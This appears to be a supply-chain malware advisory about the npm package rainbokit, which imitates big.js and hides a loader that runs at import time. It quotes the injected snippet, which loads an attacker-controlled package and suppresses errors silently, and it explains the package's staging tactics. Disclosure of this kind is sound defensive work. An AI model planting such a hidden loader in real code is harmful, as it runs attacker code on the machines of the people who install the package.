rainbokit @0.0.8

Summary

The package publishes as rainbokit but ships a verbatim copy of the legitimate big.js library (matching author, repository URL, README, LICENCE, and keywords) so that an installer inspecting the on-disk package cannot distinguish it from genuine big.js. Both big.js (~line 488) and big.mjs contain an injected block try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } inserted into the middle of the otherwise-unmodified big.js source. When a consumer does require('rainbokit') or import 'rainbokit' , this block runs parket-slot.from_str() — code controlled by the attacker. The require is wrapped in an empty try/catch and the resulting promise's rejection handler is also empty, so any error is silently swallowed (anti-detection). parket-slot is not declared in dependencies ; the only declared dependency is log-taker@^0.0.9 , which is never referenced from the visible code. This declared-but-unused / used-but-undeclared split is consistent with a multi-package staging campaign where the attacker resolves parket-slot and log-taker from sibling packages they control. The combination of identity spoofing of a popular package, hidden second-stage loader fired at import time, and silent error suppression demonstrates intent to execute attacker-controlled code on installer machines.

Source: amazon-inspector (692bd458c1417d7b87761cfa62e666685cb8d2ebf605b54de3ef8ad5dd993555)